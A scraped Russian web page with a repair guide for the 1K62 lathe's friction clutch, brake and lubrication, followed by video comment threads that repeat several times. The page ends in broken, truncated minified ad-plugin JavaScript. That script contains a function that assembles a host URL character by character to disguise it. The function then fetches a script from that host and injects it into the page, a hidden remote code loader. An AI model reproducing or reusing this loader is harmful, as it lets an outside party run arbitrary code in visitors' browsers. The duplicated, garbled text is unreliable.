121 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Ремонт фрикциона токарного станка 1к62

Ремонт фрикциона токарного станка 1к62

В процессе эксплуатации токарного станка рано или поздно вы столкнетесь с какой-либо неисправностью. Особенно высока вероятность поломки, если вы используете в работе агрегат с немалым «пробегом». В этом случае нужно быть готовым не только к мелким неисправностям, но и к возможной необходимости произвести капитальный ремонт токарного станка, а это весьма и весьма затратная затея.

К счастью, конструкция большинства агрегатов (особенно тех, что производились во времена СССР) достаточно проста для того, чтобы вы справились с ремонтом токарного станка без привлечения стороннего специалиста. Ниже на примере модели 1К62 мы рассмотрим самые распространенные поломки, причины их возникновения и методы устранения. Если на практике вы столкнетесь с описанными проблемами – скорее всего, вы сможете выполнить ремонт своими силами, следуя нижеприведенным рекомендациям.

Основные поломки, причины и методы их устранения

Первоначальная причина возникновения большинства неисправностей в работе токарного станка – неправильная эксплуатация и уход за оборудованием. Мастеру следует знать, как обслуживать агрегат. Это позволит в будущем сэкономить немалые суммы, так как капитальный ремонт токарных станков обходится недешево, даже если вы будете производить починку своими силами.

Специалисты рекомендуют перед тем, как впервые приступать к работе за станком, подробно изучить рекомендации по эксплуатации и другую документацию, которая поставляется в комплекте с оборудованием. Если вы приобретаете б/у станок без инструкции, то имеет смысл найти всю документацию, касающуюся агрегата 1К62 или любой другой модели, самостоятельно в сети.

Теперь, когда вы узнали о тонкостях эксплуатации вашего «помощника», настало время изучить самые распространенные поломки и способы их устранения. Для удобства восприятия приведем советы по ремонту токарного станка 1К62 в виде списка:

  • Станок не включается. Самая распространенная и наиболее простая в решении проблема. Она, скорее всего, связана с отсутствием сетевого напряжения. Мастеру рекомендуется проконтролировать наличие и показатели напряжения.
  • Не удается с помощью рукояти переключить блок шестерен, агрегат издает типичный звук проскальзывания. Такого рода проблема связана с тем, что блок не выводится из холостого положения. Рекомендуется запустить повторно электромотор и осуществить включение передачи «на выбеге».
  • Электромотор самопроизвольно отключается в процессе работы. Скорее всего, это срабатывает реле, защищающее силовой агрегат от чрезмерной нагрузки. В этом случае мастеру стоит снизить интенсивность резания или подачи.
  • Недостаточно высокий крутящий момент шпинделя, который не достигает предела, указанного в документации. Проблема может состоять в недостаточно сильном натяжении ремней. Увеличив его, вы повысите крутящий момент. Еще одной причиной проявления проблемы может быть плохо затянутая фрикционная муфта, увеличив натяжение которой, вам также удастся повысить крутящий момент.
  • Медленное торможение шпинделя. В большинстве случаев причина этой неисправности – недостаточно сильное натяжение ленты торможения. Увеличив этот параметр, вы отметите, что торможение стало более динамичным.
  • Усиление подачи суппорта не достигает показателей, указанных в документации. Чтобы справиться с проблемой, специалисты рекомендуют сильнее затянуть пружину перегрузочного устройства.
  • Охлаждающий насос не функционирует. Обычно возникновение этой проблемы связывают с недостаточно высоким уровнем охлаждающей жидкости в системе. Долив ее, в большинстве случаев вам удастся устранить неисправность. Также причиной этой проблемы может оказаться выход из строя предохранителей. Обычная замена на новые решит внезапно возникшую перед вами задачу.
  • Чрезмерная вибрация станка во время работы. Причин это этому может быть несколько. Первая – это некорректный монтаж агрегата по уровню. В этом случае нужно выверить станок. Вторая возможная причина – это износ стыка направляющих суппорта. Подтяните прижимные клинья и планки, и, скорее всего, ситуация исправиться. Также чрезмерные вибрации часто связывают с некорректным подбором режима резания или с неправильной заточкой режущего инструмента.
  • Точность обработки заготовки неудовлетворительная. Есть четыре основные причины такой проблемы. Это – поперечное смещение задней бабки, чрезмерный вылет зафиксированной в патроне конструкции, недостаточно жесткая фиксация держателя резца или патрона. В первом случае вам необходимо настроить положение бабки, во втором – поджать конструкцию центром или поддержать люнетом. В третьем и четвертом случае вам следует подтянуть рукоять держателя резца или ремни крепления патрона.

Нередко ремонт токарного станка 1К62 нужно произвести по причине неисправности смазочной системы. Если в маслоуказателе отсутствует слабая струя смазки, то это говорит о том, что винт упора рычага насоса не настроен. Мастеру нужно отрегулировать положение плунжера.

Если же струя масла есть, но она очень слабая, то, скорее всего, причина – загрязнение фильтра. Проблема решается банальной промывкой фильтра.

Кроме того, неисправность пружины плунжерного насоса может привести к полному отсутствию струи смазки в маслоуказателе. Заменив пружину, вы устраните проблему. Если же смазочная жидкость не подается на направляющие станины, то причина, скорее всего, лежит в загрязнении одного из клапанов плунжерного насоса. Опять же, ремонт заключается в тщательной промывке.

Итоги

Как видно, ремонт токарных станков можно производить самому, если разбираться в способах устранения основных неисправностей. Надеемся, что представленная информация сэкономит вам деньги и массу времени.

Oynatıcı kontrollerini göster

  • katma 26 Mar 2017
  • metallhouse.com

YORUMLAR • 46

Когда я протягиваю ленту тормозную обороты и мощность падает где-то через месяц . (ленту не сильно протягиваю )

Много лишних телодвижений. И не нужной разборки.

Купил токарный vdf torna e2. Проблем у него много но одна из это буксующий фрикцион. Патрон не хочет разгоняться. Предстоит разбор, я так понимаю что износились диски, потому что в одну сторону крутит хорошо, а в другую буксует.

тут немного другой станок

регулировка фрикциона не помогает ?

Спасибо большое за это прекрасное видео. Дай Бог вам здоровье!

запчасти к токарным и фрезерным станкам сайт kev.com.ua

Добрий день, яка нормальна температура фрекціона при роботі?Приблизно.

Здравствуйте! У меня проблема на 1а62. хочу купить, но там при включении ручки вверх, вал очень быстро раскручивался, при включении в нейтралку а потом вниз то еле крутился. потом я обратный фрикцион подкрутил ( токарь мне подкрутил) то обороты стали в обе стороны одинаково, но патрон я удерживаю руками. Токарь мой незнает как правильно регулировать. А станок по такой цене хотелось бы забрать. Подскажите стоит с таким связываться?

эта деталь штифт конический ,а съемник обычный штифтодер

сначала включают двигатель чтоб насос начал качать масло на фрикцион в том числе а потом вкл вращение

А смысл? Фрикцион фращается и на холостых оборотах ибо плунжерный насос для масла берет движение от фрикциона.

Шарики магнитом можно извлекать.

Вообще то пуск явно с затиранием на фрикционах. И как мне кажется, из далека, просто не работает тормоз и токарь при работе тормозит реверсом. А реверс в свою очередь интенсивно изнашивается, о чём свидетельствует чёрная субстанция вместо масла. Фрикционы в среднем положении, должны быть оба розжаты и не оказывать сопротивления вращению приводного вала. Ну о этом можно долго говорить, но я привык делать по инструкции (ведь не дураки их пишут).
Работа фрикционной муфты заключается в том, что при прижатии дисков 3 к дискам 12 между ними благодаря трению возникает сцепление и вращение от вала I через диски передается к блоку зубчатых колес 56-51 или к колесу 50. Фрикцион включается муфтой 7 (М1 на рис. 176). При включении муфты влево включается прямое вращение шпинделя, при включении вправо — обратное вращение. Диски фрикционной муфты постепенно изнашиваются, и муфта начинает пробуксовывать. Для устранения этого при помощи гаек 4 и 5 сближают фрикционные диски. Тормозное устройство (тормоз) (рис. 186). На валу III коробки скоростей (см. рис. 176) закреплен тормозной шкив 5, охватываемый стальной тормозной лентой 4. Включение тормоза происходит при нейтральном положении фрикционной муфты, когда выступ рейки 6 воздействует на рычаг 3. Тормоз регулируют (см. рис. 186) натяжением тормозной ленты 4 гайкой 2. При правильно отрегулированном тормозе время торможения шпинделя (без патрона и заготовки), вращающегося с частотой 2000 об/мин должно составлять не более 1,5 с.
Думаю разберётесь.

Явсю жизнь работал слесарем поремонту станков,За смену не раз подойдешь к станку станок подручный можно одному разбирать до ниточки когдаработал на кап ремонте полностью собирал эти станки вместе с шабрением плота задней бабки станина шлифовалась вот никогда недумал что буду слотретьна ремонт винтернете ставлю лайк про причину не перетягивать задний фрикцион , чтобы при нейтрали еоромысло было ровно в пазу вала.

Владимир, а сколько раз попадались изношенные коромысла? именно изношенные, а не замученные горе ремонтувальниками. У меня жменя коромысл. Разных, одно явно пиляное. За почти сорок лет у станков, ни-разу не пригодились.

У меня в картере коробки масло чистое все детали чистые а у тебя как в картере старого дизельного мотора.

Это гарь с фрикционных пластин. Масло менять надо. Каждые10000р/час даже чистое. Индустриальное вязкость 20. Промыть солярка 70% масло любое 30%15-20 минут на максимальных оборотах по 5 минут.

Я тоже весь перебирал отмывал менял колечки резиновые везде они закостенели 3 подшипника под замену так что в любом случае его надо капиталить

Ремонт фрикциона станка 1к62. Полезные советы. Видео 1.

Показувати елементи керування програвачем

  • Опубліковано 26 бер 2017
  • metallhouse.com

КОМЕНТАРІ • 48

У вас из под крышки масло не бежит.

Мужик с тебя мастер по металл обработке как пуля из говна лучше пародируй советских вождей ржака капитальная

Когда я протягиваю ленту тормозную обороты и мощность падает где-то через месяц . (ленту не сильно протягиваю )

Много лишних телодвижений. И не нужной разборки.

Купил токарный vdf torna e2. Проблем у него много но одна из это буксующий фрикцион. Патрон не хочет разгоняться. Предстоит разбор, я так понимаю что износились диски, потому что в одну сторону крутит хорошо, а в другую буксует.

тут немного другой станок

регулировка фрикциона не помогает ?

Спасибо большое за это прекрасное видео. Дай Бог вам здоровье!

запчасти к токарным и фрезерным станкам сайт kev.com.ua

Добрий день, яка нормальна температура фрекціона при роботі?Приблизно.

Здравствуйте! У меня проблема на 1а62. хочу купить, но там при включении ручки вверх, вал очень быстро раскручивался, при включении в нейтралку а потом вниз то еле крутился. потом я обратный фрикцион подкрутил ( токарь мне подкрутил) то обороты стали в обе стороны одинаково, но патрон я удерживаю руками. Токарь мой незнает как правильно регулировать. А станок по такой цене хотелось бы забрать. Подскажите стоит с таким связываться?

эта деталь штифт конический ,а съемник обычный штифтодер

сначала включают двигатель чтоб насос начал качать масло на фрикцион в том числе а потом вкл вращение

А смысл? Фрикцион фращается и на холостых оборотах ибо плунжерный насос для масла берет движение от фрикциона.

Шарики магнитом можно извлекать.

Вообще то пуск явно с затиранием на фрикционах. И как мне кажется, из далека, просто не работает тормоз и токарь при работе тормозит реверсом. А реверс в свою очередь интенсивно изнашивается, о чём свидетельствует чёрная субстанция вместо масла. Фрикционы в среднем положении, должны быть оба розжаты и не оказывать сопротивления вращению приводного вала. Ну о этом можно долго говорить, но я привык делать по инструкции (ведь не дураки их пишут).
Работа фрикционной муфты заключается в том, что при прижатии дисков 3 к дискам 12 между ними благодаря трению возникает сцепление и вращение от вала I через диски передается к блоку зубчатых колес 56-51 или к колесу 50. Фрикцион включается муфтой 7 (М1 на рис. 176). При включении муфты влево включается прямое вращение шпинделя, при включении вправо — обратное вращение. Диски фрикционной муфты постепенно изнашиваются, и муфта начинает пробуксовывать. Для устранения этого при помощи гаек 4 и 5 сближают фрикционные диски. Тормозное устройство (тормоз) (рис. 186). На валу III коробки скоростей (см. рис. 176) закреплен тормозной шкив 5, охватываемый стальной тормозной лентой 4. Включение тормоза происходит при нейтральном положении фрикционной муфты, когда выступ рейки 6 воздействует на рычаг 3. Тормоз регулируют (см. рис. 186) натяжением тормозной ленты 4 гайкой 2. При правильно отрегулированном тормозе время торможения шпинделя (без патрона и заготовки), вращающегося с частотой 2000 об/мин должно составлять не более 1,5 с.
Думаю разберётесь.

Явсю жизнь работал слесарем поремонту станков,За смену не раз подойдешь к станку станок подручный можно одному разбирать до ниточки когдаработал на кап ремонте полностью собирал эти станки вместе с шабрением плота задней бабки станина шлифовалась вот никогда недумал что буду слотретьна ремонт винтернете ставлю лайк про причину не перетягивать задний фрикцион , чтобы при нейтрали еоромысло было ровно в пазу вала.

Владимир, а сколько раз попадались изношенные коромысла? именно изношенные, а не замученные горе ремонтувальниками. У меня жменя коромысл. Разных, одно явно пиляное. За почти сорок лет у станков, ни-разу не пригодились.

У меня в картере коробки масло чистое все детали чистые а у тебя как в картере старого дизельного мотора.

Это гарь с фрикционных пластин. Масло менять надо. Каждые10000р/час даже чистое. Индустриальное вязкость 20. Промыть солярка 70% масло любое 30%15-20 минут на максимальных оборотах по 5 минут.

Я тоже весь перебирал отмывал менял колечки резиновые везде они закостенели 3 подшипника под замену так что в любом случае его надо капиталить

Ремонт фрикциона станка 1к62. Полезные советы. Видео 1.

Oyunçu kontrollarını göstərin

  • Tarixində dərc edildi 26 Mar 2017
  • metallhouse.com

Şərh • 48

У вас из под крышки масло не бежит.

Мужик с тебя мастер по металл обработке как пуля из говна лучше пародируй советских вождей ржака капитальная

Когда я протягиваю ленту тормозную обороты и мощность падает где-то через месяц . (ленту не сильно протягиваю )

Много лишних телодвижений. И не нужной разборки.

Купил токарный vdf torna e2. Проблем у него много но одна из это буксующий фрикцион. Патрон не хочет разгоняться. Предстоит разбор, я так понимаю что износились диски, потому что в одну сторону крутит хорошо, а в другую буксует.

тут немного другой станок

регулировка фрикциона не помогает ?

Спасибо большое за это прекрасное видео. Дай Бог вам здоровье!

запчасти к токарным и фрезерным станкам сайт kev.com.ua

Добрий день, яка нормальна температура фрекціона при роботі?Приблизно.

Здравствуйте! У меня проблема на 1а62. хочу купить, но там при включении ручки вверх, вал очень быстро раскручивался, при включении в нейтралку а потом вниз то еле крутился. потом я обратный фрикцион подкрутил ( токарь мне подкрутил) то обороты стали в обе стороны одинаково, но патрон я удерживаю руками. Токарь мой незнает как правильно регулировать. А станок по такой цене хотелось бы забрать. Подскажите стоит с таким связываться?

эта деталь штифт конический ,а съемник обычный штифтодер

сначала включают двигатель чтоб насос начал качать масло на фрикцион в том числе а потом вкл вращение

А смысл? Фрикцион фращается и на холостых оборотах ибо плунжерный насос для масла берет движение от фрикциона.

Шарики магнитом можно извлекать.

Вообще то пуск явно с затиранием на фрикционах. И как мне кажется, из далека, просто не работает тормоз и токарь при работе тормозит реверсом. А реверс в свою очередь интенсивно изнашивается, о чём свидетельствует чёрная субстанция вместо масла. Фрикционы в среднем положении, должны быть оба розжаты и не оказывать сопротивления вращению приводного вала. Ну о этом можно долго говорить, но я привык делать по инструкции (ведь не дураки их пишут).
Работа фрикционной муфты заключается в том, что при прижатии дисков 3 к дискам 12 между ними благодаря трению возникает сцепление и вращение от вала I через диски передается к блоку зубчатых колес 56-51 или к колесу 50. Фрикцион включается муфтой 7 (М1 на рис. 176). При включении муфты влево включается прямое вращение шпинделя, при включении вправо — обратное вращение. Диски фрикционной муфты постепенно изнашиваются, и муфта начинает пробуксовывать. Для устранения этого при помощи гаек 4 и 5 сближают фрикционные диски. Тормозное устройство (тормоз) (рис. 186). На валу III коробки скоростей (см. рис. 176) закреплен тормозной шкив 5, охватываемый стальной тормозной лентой 4. Включение тормоза происходит при нейтральном положении фрикционной муфты, когда выступ рейки 6 воздействует на рычаг 3. Тормоз регулируют (см. рис. 186) натяжением тормозной ленты 4 гайкой 2. При правильно отрегулированном тормозе время торможения шпинделя (без патрона и заготовки), вращающегося с частотой 2000 об/мин должно составлять не более 1,5 с.
Думаю разберётесь.

Явсю жизнь работал слесарем поремонту станков,За смену не раз подойдешь к станку станок подручный можно одному разбирать до ниточки когдаработал на кап ремонте полностью собирал эти станки вместе с шабрением плота задней бабки станина шлифовалась вот никогда недумал что буду слотретьна ремонт винтернете ставлю лайк про причину не перетягивать задний фрикцион , чтобы при нейтрали еоромысло было ровно в пазу вала.

Владимир, а сколько раз попадались изношенные коромысла? именно изношенные, а не замученные горе ремонтувальниками. У меня жменя коромысл. Разных, одно явно пиляное. За почти сорок лет у станков, ни-разу не пригодились.

У меня в картере коробки масло чистое все детали чистые а у тебя как в картере старого дизельного мотора.

Это гарь с фрикционных пластин. Масло менять надо. Каждые10000р/час даже чистое. Индустриальное вязкость 20. Промыть солярка 70% масло любое 30%15-20 минут на максимальных оборотах по 5 минут.

Я тоже весь перебирал отмывал менял колечки резиновые везде они закостенели 3 подшипника под замену так что в любом случае его надо капиталить

Ремонт фрикциона станка 1к62. Полезные советы. Видео 1.

Oyunçu kontrollarını göstərin

  • Tarixində dərc edildi 26 Mar 2017
  • metallhouse.com

Şərh • 48

У вас из под крышки масло не бежит.

Мужик с тебя мастер по металл обработке как пуля из говна лучше пародируй советских вождей ржака капитальная

Когда я протягиваю ленту тормозную обороты и мощность падает где-то через месяц . (ленту не сильно протягиваю )

Много лишних телодвижений. И не нужной разборки.

Купил токарный vdf torna e2. Проблем у него много но одна из это буксующий фрикцион. Патрон не хочет разгоняться. Предстоит разбор, я так понимаю что износились диски, потому что в одну сторону крутит хорошо, а в другую буксует.

тут немного другой станок

регулировка фрикциона не помогает ?

Спасибо большое за это прекрасное видео. Дай Бог вам здоровье!

запчасти к токарным и фрезерным станкам сайт kev.com.ua

Добрий день, яка нормальна температура фрекціона при роботі?Приблизно.

Здравствуйте! У меня проблема на 1а62. хочу купить, но там при включении ручки вверх, вал очень быстро раскручивался, при включении в нейтралку а потом вниз то еле крутился. потом я обратный фрикцион подкрутил ( токарь мне подкрутил) то обороты стали в обе стороны одинаково, но патрон я удерживаю руками. Токарь мой незнает как правильно регулировать. А станок по такой цене хотелось бы забрать. Подскажите стоит с таким связываться?

эта деталь штифт конический ,а съемник обычный штифтодер

сначала включают двигатель чтоб насос начал качать масло на фрикцион в том числе а потом вкл вращение

А смысл? Фрикцион фращается и на холостых оборотах ибо плунжерный насос для масла берет движение от фрикциона.

Шарики магнитом можно извлекать.

Вообще то пуск явно с затиранием на фрикционах. И как мне кажется, из далека, просто не работает тормоз и токарь при работе тормозит реверсом. А реверс в свою очередь интенсивно изнашивается, о чём свидетельствует чёрная субстанция вместо масла. Фрикционы в среднем положении, должны быть оба розжаты и не оказывать сопротивления вращению приводного вала. Ну о этом можно долго говорить, но я привык делать по инструкции (ведь не дураки их пишут).
Работа фрикционной муфты заключается в том, что при прижатии дисков 3 к дискам 12 между ними благодаря трению возникает сцепление и вращение от вала I через диски передается к блоку зубчатых колес 56-51 или к колесу 50. Фрикцион включается муфтой 7 (М1 на рис. 176). При включении муфты влево включается прямое вращение шпинделя, при включении вправо — обратное вращение. Диски фрикционной муфты постепенно изнашиваются, и муфта начинает пробуксовывать. Для устранения этого при помощи гаек 4 и 5 сближают фрикционные диски. Тормозное устройство (тормоз) (рис. 186). На валу III коробки скоростей (см. рис. 176) закреплен тормозной шкив 5, охватываемый стальной тормозной лентой 4. Включение тормоза происходит при нейтральном положении фрикционной муфты, когда выступ рейки 6 воздействует на рычаг 3. Тормоз регулируют (см. рис. 186) натяжением тормозной ленты 4 гайкой 2. При правильно отрегулированном тормозе время торможения шпинделя (без патрона и заготовки), вращающегося с частотой 2000 об/мин должно составлять не более 1,5 с.
Думаю разберётесь.

Явсю жизнь работал слесарем поремонту станков,За смену не раз подойдешь к станку станок подручный можно одному разбирать до ниточки когдаработал на кап ремонте полностью собирал эти станки вместе с шабрением плота задней бабки станина шлифовалась вот никогда недумал что буду слотретьна ремонт винтернете ставлю лайк про причину не перетягивать задний фрикцион , чтобы при нейтрали еоромысло было ровно в пазу вала.

Владимир, а сколько раз попадались изношенные коромысла? именно изношенные, а не замученные горе ремонтувальниками. У меня жменя коромысл. Разных, одно явно пиляное. За почти сорок лет у станков, ни-разу не пригодились.

У меня в картере коробки масло чистое все детали чистые а у тебя как в картере старого дизельного мотора.

Это гарь с фрикционных пластин. Масло менять надо. Каждые10000р/час даже чистое. Индустриальное вязкость 20. Промыть солярка 70% масло любое 30%15-20 минут на максимальных оборотах по 5 минут.

Я тоже весь перебирал отмывал менял колечки резиновые везде они закостенели 3 подшипника под замену так что в любом случае его надо капиталить

Ремонт фрикциона станка 1к62. Полезные советы. Видео 1.

Просмотров: 18 839

У вас из под крышки масло не бежит.

Lola Mandola

Мужик с тебя мастер по металл обработке как пуля из говна лучше пародируй советских вождей ржака капитальная

Алмат Ахатов

Когда я протягиваю ленту тормозную обороты и мощность падает где-то через месяц . (ленту не сильно протягиваю )

Спек Бйорн

Много лишних телодвижений. И не нужной разборки.

Мастерская АММ

Купил токарный vdf torna e2. Проблем у него много но одна из это буксующий фрикцион. Патрон не хочет разгоняться. Предстоит разбор, я так понимаю что износились диски, потому что в одну сторону крутит хорошо, а в другую буксует.

Мастерская АММ

Спасибо большое за это прекрасное видео. Дай Бог вам здоровье!

Sasha Laghuza

Добрий день, яка нормальна температура фрекціона при роботі?Приблизно.

Леонид Романюк

Александр Выщекус

Здравствуйте! У меня проблема на 1а62. хочу купить, но там при включении ручки вверх, вал очень быстро раскручивался, при включении в нейтралку а потом вниз то еле крутился. потом я обратный фрикцион подкрутил ( токарь мне подкрутил) то обороты стали в обе стороны одинаково, но патрон я удерживаю руками. Токарь мой незнает как правильно регулировать. А станок по такой цене хотелось бы забрать. Подскажите стоит с таким связываться?

Игорь Киряков

эта деталь штифт конический ,а съемник обычный штифтодер

kerenski1000

сначала включают двигатель чтоб насос начал качать масло на фрикцион в том числе а потом вкл вращение

Владимир Панаев

Шарики магнитом можно извлекать.

Нестор Махно

Вообще то пуск явно с затиранием на фрикционах. И как мне кажется, из далека, просто не работает тормоз и токарь при работе тормозит реверсом. А реверс в свою очередь интенсивно изнашивается, о чём свидетельствует чёрная субстанция вместо масла. Фрикционы в среднем положении, должны быть оба розжаты и не оказывать сопротивления вращению приводного вала. Ну о этом можно долго говорить, но я привык делать по инструкции (ведь не дураки их пишут).
Работа фрикционной муфты заключается в том, что при прижатии дисков 3 к дискам 12 между ними благодаря трению возникает сцепление и вращение от вала I через диски передается к блоку зубчатых колес 56—51 или к колесу 50. Фрикцион включается муфтой 7 (М1 на рис. 176). При включении муфты влево включается прямое вращение шпинделя, при включении вправо — обратное вращение. Диски фрикционной муфты постепенно изнашиваются, и муфта начинает пробуксовывать. Для устранения этого при помощи гаек 4 и 5 сближают фрикционные диски. Тормозное устройство (тормоз) (рис. 186). На валу III коробки скоростей (см. рис. 176) закреплен тормозной шкив 5, охватываемый стальной тормозной лентой 4. Включение тормоза происходит при нейтральном положении фрикционной муфты, когда выступ рейки 6 воздействует на рычаг 3. Тормоз регулируют (см. рис. 186) натяжением тормозной ленты 4 гайкой 2. При правильно отрегулированном тормозе время торможения шпинделя (без патрона и заготовки), вращающегося с частотой 2000 об/мин должно составлять не более 1,5 с.
Думаю разберётесь.

Владимир Шархун

Явсю жизнь работал слесарем поремонту станков,За смену не раз подойдешь к станку станок подручный можно одному разбирать до ниточки когдаработал на кап ремонте полностью собирал эти станки вместе с шабрением плота задней бабки станина шлифовалась вот никогда недумал что буду слотретьна ремонт винтернете ставлю лайк про причину не перетягивать задний фрикцион , чтобы при нейтрали еоромысло было ровно в пазу вала.

Сергей Диденко

У меня в картере коробки масло чистое все детали чистые а у тебя как в картере старого дизельного мотора.

Алексей Н

Конечно ваше дело. Но..
для того ,чтоб снять фрикционный вал достаточно выдернуть штифт вилки,что двигает карамысло. после этого освобождается все со стороны шкива и вуаля. выл вытаскивается ))

Игорь Городецкий

Здравствуйте, последние 2 дня на 1к625 начала ощущаться нагрузка на двигатель при съеме 2-3 мм с диаметра , до этого такую нагрузку он даже не чувствовал, у меня подозрения на фрикцион

олег кутьков

диски эти называются,ведомые и ведущие)))шпаргалки ваши убили

Александр Коваленко

нашел ваше видео Аналогично разбираться фрикцион 1А62 ?

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
